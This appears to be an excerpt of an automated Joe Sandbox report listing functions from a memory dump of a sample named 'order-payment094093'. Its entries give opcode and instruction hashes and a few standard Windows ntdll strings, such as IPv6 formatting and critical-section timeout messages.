Opcode Fuzzy Hash: 06251c867e8f187b01a9710cab417e404f1e705a06c97f6a01add3c5d9f4c6ee
Instruction Fuzzy Hash: 40D052316722068BDF2ACF48CA51A3A3AB8EF20A41B440068EB00A2020E328E8118A00

Function 0125C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 0889fae44eb1d344a825947ad9d9860128118490462164fa7ef224684ece9b92
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: B5C012322A0648AFC712EA99CD01F127BA9EBA8B40F000421F2048B670C635E920EA84

Function 01240310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: c01a5b7332b2c9573478b231d916aed94b05ecbecb963dba8e323c00739cdbb5
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: A8D01236110248EFCB05DF41C890DAA7B2AFBD8710F108019FD19076108A71ED62DA50

Function 01220750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: f099d67f9a27a2efbe62d1ef045de3ed443eaa4d3b435dd76bb2dd324d9c9022
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 14C04C797215468FCF15DB19D294F5677E4F744750F1508D0E905CB721E624E901CA10

Function 01264340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376b17c3499ef1b99f30c5ea251bf7635a5155134d0da489473c4b1d8712d83f
Instruction ID: 03d65e55d4b72c474161b7b0d422ed404d806ded4e41e2aa99fc1b97cb8cfd91
Opcode Fuzzy Hash: 376b17c3499ef1b99f30c5ea251bf7635a5155134d0da489473c4b1d8712d83f
Instruction Fuzzy Hash: B8900231616800129240715848885474005A7E0301B55C021E1424554CCA248A565361

Function 01264650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12738f8df6d84e02f496f2f8e1317938d2b903e2109719cbcbdef6199c1034f3
Instruction ID: f4029e59fccbb3544bcc4013e520144fd6a7bf647ed2ff1fe142b326d89eb09d
Opcode Fuzzy Hash: 12738f8df6d84e02f496f2f8e1317938d2b903e2109719cbcbdef6199c1034f3
Instruction Fuzzy Hash: 1D900261612500424240715848084076005A7E1301395C125A1554560CC62889559369

Function 01262BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 352767a28905c9e379ec1acef23ac90e2248d216ba973191e5d250c4bfa296fa
Instruction ID: 5a4e8fb47f39797281f112706b6ef14719b814631a8232ddcb45caee3b718550
Opcode Fuzzy Hash: 352767a28905c9e379ec1acef23ac90e2248d216ba973191e5d250c4bfa296fa
Instruction Fuzzy Hash: F690023161640802D25071584418747000597D0301F55C021A1024654DC7658B5577A1

Function 01262B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55dda763c70c8e039ee361c13d682f33babcee819f0aef40662511160c5b0384
Instruction ID: c150dbc45cddb36c214a13ddf63fe485d5e107338b5da83bc5dc2048182f1724
Opcode Fuzzy Hash: 55dda763c70c8e039ee361c13d682f33babcee819f0aef40662511160c5b0384
Instruction Fuzzy Hash: BC90023121240802D20471584808687000597D0301F55C021A7024655ED67589917231

Function 01262BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1982983e3cbadba8e4303c3c6119e5e338831e860e9938593049a9c65cee0b00
Instruction ID: 696d4b37193e30e33ebc69b7ac0daaa4824da8917ca3391d3d92603547505602
Opcode Fuzzy Hash: 1982983e3cbadba8e4303c3c6119e5e338831e860e9938593049a9c65cee0b00
Instruction Fuzzy Hash: 6E90023121644842D24071584408A47001597D0305F55C021A1064694DD6358E55B761

Function 01262AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a931cb8926801b853cc0915c7c9c39ed942837e40b45139a9a2174fc97760ad
Instruction ID: 67d1ae6e2ca5e0aade1cc87c0c5d55edbe31fc77245e1cf70642ac7f2ba16582
Opcode Fuzzy Hash: 4a931cb8926801b853cc0915c7c9c39ed942837e40b45139a9a2174fc97760ad
Instruction Fuzzy Hash: BB9002A1212540924600B2588408B0B450597E0201B55C026E2054560CC53589519235

Function 01262AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706ec87bb68d8a59f6952733cd84cf8b604d75e298ccf390fd39c54900112cbf
Instruction ID: b9f3b03001f47b807475e1548f8ae1d25a25149531930aa2b445ab7281f3c8e9
Opcode Fuzzy Hash: 706ec87bb68d8a59f6952733cd84cf8b604d75e298ccf390fd39c54900112cbf
Instruction Fuzzy Hash: 81900225232400020245B558060850B0445A7D6351395C025F2416590CC63189655321

Function 01262D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0584455118de26b6766d7387327287b82731fc568b356e8e6a9ff7a4175bed76
Instruction ID: cef821ac5ad9e23426a111bcfe9c6074f03dc228628b38a09f93b12ab97afce5
Opcode Fuzzy Hash: 0584455118de26b6766d7387327287b82731fc568b356e8e6a9ff7a4175bed76
Instruction Fuzzy Hash: 4190022121644442D2007558540CA07000597D0205F55D021A2064595DC6358951A231

Function 01262DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 869935db56b523ea38470ada6443de2cf492b4abd87656bc82e3005967c7fef5
Instruction ID: 63ca2c5529cd6073f3340bbb378f043b887db23fac7f518756aa28244787ca7c
Opcode Fuzzy Hash: 869935db56b523ea38470ada6443de2cf492b4abd87656bc82e3005967c7fef5
Instruction Fuzzy Hash: CB90023125240402D241715844086070009A7D0241F95C022A1424554EC6658B56AB61

Function 01262C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c85de712638272d7d9a00d71fe6f80b0cee30f070b38495f9a1918427af6577
Instruction ID: f54017568b9ec0d1e423e946a816386d7b8d4155f91660e25530014b80e9f8f9
Opcode Fuzzy Hash: 0c85de712638272d7d9a00d71fe6f80b0cee30f070b38495f9a1918427af6577
Instruction Fuzzy Hash: CB90023121240842D20071584408B47000597E0301F55C026A1124654DC625C9517621

Function 01262CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a6a6c73ec0fb148c372541f6aa2804fa35dd4acb9be5a3282ba6a16d28d67c8
Instruction ID: 051647e80d58425d08a2898a7804616e661738d08ac87a004f969063569c697e
Opcode Fuzzy Hash: 0a6a6c73ec0fb148c372541f6aa2804fa35dd4acb9be5a3282ba6a16d28d67c8
Instruction Fuzzy Hash: 7190023121240403D2007158550C707000597D0201F55D421A1424558DD66689516221

Function 01262CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8477e579ca05daf645cd0035d548bac19433c4a86ee667db8287cbabfd7cb44
Instruction ID: e3e04f00708f440dac10ecd6fd3d5c0d3cf8dbe2bb1b7f75047ae513a4031e32
Opcode Fuzzy Hash: b8477e579ca05daf645cd0035d548bac19433c4a86ee667db8287cbabfd7cb44
Instruction Fuzzy Hash: 4090022161640402D2407158541C707001597D0201F55D021A1024554DC6698B5567A1

Function 01262F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4e25673e10234b13e5d87f1096e3da6fdea64e3ad72e7f1e358d0d9f8d16ed
Instruction ID: 27685442a436e56f494d7763662336807084f565a666342746672a206b58c4d9
Opcode Fuzzy Hash: 1f4e25673e10234b13e5d87f1096e3da6fdea64e3ad72e7f1e358d0d9f8d16ed
Instruction Fuzzy Hash: 5790026122240042D20471584408707004597E1201F55C022A3154554CC5398D615225

Function 01262FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca4803e7cbedc7c064c7bd770729716118a75164c6c9478082aaa27a66376e35
Instruction ID: c4821b49e8cdfcebfbd06e180f48b97f90e11492f51c6f6b7e618607e548c5fd
Opcode Fuzzy Hash: ca4803e7cbedc7c064c7bd770729716118a75164c6c9478082aaa27a66376e35
Instruction Fuzzy Hash: B190023121280402D2007158480C747000597D0302F55C021A6164555EC675C9916631

Function 01262E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1578a0ba1f483e5c60187b1807229bca2bac062ad6ec0ce487d14677386d3d32
Instruction ID: 3efab65860cb5692501fdf09eab301c7caee3a17077eca346f6235331b3b8421
Opcode Fuzzy Hash: 1578a0ba1f483e5c60187b1807229bca2bac062ad6ec0ce487d14677386d3d32
Instruction Fuzzy Hash: 8690022131240402D202715844186070009D7D1345F95C022E2424555DC6358A53A232

Function 01262EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21cff4de713777de7b12ff36b6502f46acd8ab6587b69b738ad5d6f96fb8fbd7
Instruction ID: b15a1f3819f03d5b1504adcb5ceda68ebfda8665f4c64e6240076214b8d76950
Opcode Fuzzy Hash: 21cff4de713777de7b12ff36b6502f46acd8ab6587b69b738ad5d6f96fb8fbd7
Instruction Fuzzy Hash: EA90026121280403D24075584808607000597D0302F55C021A3064555ECA398D516235

Function 01263010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736e6426a1b44f6e81bac825edc1a7ab51b4a76600b93f7d29fa4a4ba0c05cca
Instruction ID: b598fcdf33aa129e53af85cfa0acc44a21235f149dd32e2a87228e5a65fcf028
Opcode Fuzzy Hash: 736e6426a1b44f6e81bac825edc1a7ab51b4a76600b93f7d29fa4a4ba0c05cca
Instruction Fuzzy Hash: F290022121284442D24072584808B0F410597E1202F95C029A5156554CC92589555721

Function 01263090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dacb00b6660553f1f821c9d40892bc5c4b4526349f4abf25b7c749c260227c08
Instruction ID: 378d4656de4b25525b73ed998136491f1cbf561f8fdea84bb8713797eed05769
Opcode Fuzzy Hash: dacb00b6660553f1f821c9d40892bc5c4b4526349f4abf25b7c749c260227c08
Instruction Fuzzy Hash: 7090022125240802D240715884187070006D7D0601F55C021A1024554DC6268A6567B1

Function 012635C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe8894f59c6c46ce78cf668b23ba3ab764ab6da1ccff572fe3031c9d6f0cb41
Instruction ID: 7ec4c11d6313640972b1eebd8bae4a0779b9cd0e78d946eb8d8483aa20474d9a
Opcode Fuzzy Hash: efe8894f59c6c46ce78cf668b23ba3ab764ab6da1ccff572fe3031c9d6f0cb41
Instruction Fuzzy Hash: 2C90023161650402D20071584518707100597D0201F65C421A1424568DC7A58A5166A2

Function 012639B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c962f18aa2d5196c189af0292b51081b0b403efd62bf05ecd42b74f71cb84d7
Instruction ID: 3f6a2e3cd9b32884e6ce1a014cd374d6422778c8cb61c33927361183f2c6a9d4
Opcode Fuzzy Hash: 8c962f18aa2d5196c189af0292b51081b0b403efd62bf05ecd42b74f71cb84d7
Instruction Fuzzy Hash: 7D90022125645102D250715C44086174005B7E0201F55C031A1814594DC56589556321

Function 01263D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeeba30df3dcdfe15ea5f1918d2a6b6aaf9fad4c75a61ceaf853cd0d23f096e5
Instruction ID: 10c87c07a0f5f78247010cb2b74a1dbecb732dadec22b3385d9adb722add6862
Opcode Fuzzy Hash: eeeba30df3dcdfe15ea5f1918d2a6b6aaf9fad4c75a61ceaf853cd0d23f096e5
Instruction Fuzzy Hash: 1090023121340142964072585808A4F410597E1302B95D425A1015554CC92489615321

Function 01263D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26f4811db2918316aea995e989d2aabacc023329837283bf78c4bdb74593e992
Instruction ID: 20c9bba84fd7a65be5abdba463055513476b505dbddb2ec062167c782e109a7c
Opcode Fuzzy Hash: 26f4811db2918316aea995e989d2aabacc023329837283bf78c4bdb74593e992
Instruction Fuzzy Hash: CC90023521240402D61071585808647004697D0301F55D421A1424558DC66489A1A221

Function 01262C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 086408ec3c2432fe1f68a9e814731704395c99cb7cbf41fcf06ddafc4159e156
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01262890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0126293C
___swprintf_l.LIBCMT ref: 0126295E
___swprintf_l.LIBCMT ref: 012629A3
___swprintf_l.LIBCMT ref: 0129A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0129A54E
ffff:, xrefs: 0129A504
:%u.%u.%u.%u, xrefs: 0129A5B8
::%hs%u.%u.%u.%u, xrefs: 0129A527

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 3839e6f9a53d400b6492ca219d8d60759679ef39e1eeb598b3a9b0a131ead74b
Instruction ID: 7428d133ed13f03d022b412eda207d2f5fd347460d0f2223fb672ebb0116fd31
Opcode Fuzzy Hash: 3839e6f9a53d400b6492ca219d8d60759679ef39e1eeb598b3a9b0a131ead74b
Instruction Fuzzy Hash: F451E5B2A20217AFDB15DF9C888097EFBBCBB58240714C129E569D7681D374DE848BA0

Function 012D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012D24A6
___swprintf_l.LIBCMT ref: 012D24E2
___swprintf_l.LIBCMT ref: 012D257D
___swprintf_l.LIBCMT ref: 012D25A3
___swprintf_l.LIBCMT ref: 012D25C8
___swprintf_l.LIBCMT ref: 012D2608

Strings

ffff:, xrefs: 012D247D, 012D249D
::%hs%u.%u.%u.%u, xrefs: 012D249E
::ffff:0:%u.%u.%u.%u, xrefs: 012D24DA
:%u.%u.%u.%u, xrefs: 012D25FF

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8f8a73c36f925ec56629ee566039527623c2535a0f9023dca7041c3978de89ba
Instruction ID: 48393d5c351b361181a9acd3c4a2a64fae27f23c238ec61222970423fa472a12
Opcode Fuzzy Hash: 8f8a73c36f925ec56629ee566039527623c2535a0f9023dca7041c3978de89ba
Instruction Fuzzy Hash: 89513671A20646EFCB34DF9CD99097FBBF9EF44200B448459EA96D3641E6B4EE00C760

Function 01257630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01294655
CLIENT(ntdll): Processing section info %ws..., xrefs: 01294787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01294742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01294725
ExecuteOptions, xrefs: 012946A0
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012946FC
Execute=1, xrefs: 01294713

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 3cfc84124ce5c9c5d1cde2476ff52fff848ba64adf7abd432dff349f60b34935
Instruction ID: 76d961e37a84f8475009ef97592489877df60170b7c5f2bd6b71784faebafd8b
Opcode Fuzzy Hash: 3cfc84124ce5c9c5d1cde2476ff52fff848ba64adf7abd432dff349f60b34935
Instruction Fuzzy Hash: FD51193166021ABFEF25AAA8ECC5FFD77ACAF14304F440199DA05A71D1D770DA418F61

Function 0126B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0126B6BF

Strings

0, xrefs: 0126B66F
0, xrefs: 0126B695
-, xrefs: 0126B650
+, xrefs: 0126B65A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 376fbd8883c503ddef54b3517b8973442574e169b1ccf90b290d1d0b0b0dabbe
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: F181C231F2524A8EEF298E6CC8917FEBBB9AF45320F184119DA51E72D1C73488C0CB51

Function 012D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 012D214F
___swprintf_l.LIBCMT ref: 012D2172

Strings

]:%u, xrefs: 012D2169
[, xrefs: 012D212B
%%%u, xrefs: 012D2146

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 38dab1bbf86b3e200033036a8838d4ff6aabb2e3fa97cd67c2265c57f9b6da12
Instruction ID: cdb9dc188ce07c511217631bead11f66773c1ad2c7cf091d75e70c0c64996e07
Opcode Fuzzy Hash: 38dab1bbf86b3e200033036a8838d4ff6aabb2e3fa97cd67c2265c57f9b6da12
Instruction Fuzzy Hash: E921927AA2011AEBDB11DF79CC40AFEBBFCEF54650F044116EA15E3241E730DA018BA0

Function 0124F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0129031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012902E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012902BD

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 847ab19252313410435e5e55f4cfd46ea5e741716b5f807695f3f0b72f8bec34
Instruction ID: 28c849d14b925c7a674d257e6cf08f1f92f3318a03bf2b1e2184431871d60d13
Opcode Fuzzy Hash: 847ab19252313410435e5e55f4cfd46ea5e741716b5f807695f3f0b72f8bec34
Instruction Fuzzy Hash: 2EE1AE706247429FEB29CF2CC985B2ABBE4BF84314F140A5DF6A58B2D1D774D844CB46

Function 0125BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01297BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01297B7F
RTL: Resource at %p, xrefs: 01297B8E

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: c3c737273c4628ff0423658b72c20939d50ea6d9929fd9eeb95e7cd48ba43e0c
Instruction ID: b5bbf7f948a754798aa6117a74604355a7c09486091de49ade91892ab8bf4897
Opcode Fuzzy Hash: c3c737273c4628ff0423658b72c20939d50ea6d9929fd9eeb95e7cd48ba43e0c
Instruction Fuzzy Hash: 2641E3317207039FDB25CE29C891B6AB7E6EF98710F100A1DFE5A97280DB71E8058B91

Function 0125B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0129728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01297294
RTL: Re-Waiting, xrefs: 012972C1
RTL: Resource at %p, xrefs: 012972A3

Memory Dump Source

